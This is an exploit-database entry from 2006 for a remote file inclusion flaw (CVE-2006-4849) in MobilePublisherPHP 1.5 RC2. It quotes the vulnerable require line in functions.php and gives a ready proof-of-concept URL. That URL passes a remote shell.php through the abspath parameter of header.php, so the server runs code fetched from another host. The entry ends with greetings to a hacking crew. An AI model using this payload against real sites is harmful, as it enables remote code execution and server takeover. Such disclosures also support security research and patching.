MobilePublisherPHP 1.5 RC2 - Remote File Inclusion
Author: Timq
type: webapps
platform: php
port:
date_added: 2006-09-16
date_updated:
verified: 1
codes: OSVDB-28920;CVE-2006-4849
tags:
aliases:
screenshot_url:
application_url:
MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability
##################################################################
Discovered by: Timq
http://www.securitydb.org
Team-Rootshell
##################################################################
Email: timq[at]hackernetwork[dot]com
http://www.securitydb.org
Team-Rootshell
##################################################################
Vulnerable: require $abspath."/functions.php";
###################################################################
Exploit PoC:
http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?
####################################################################
Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender
#####################################################################
# milw0rm.com [2006-09-17]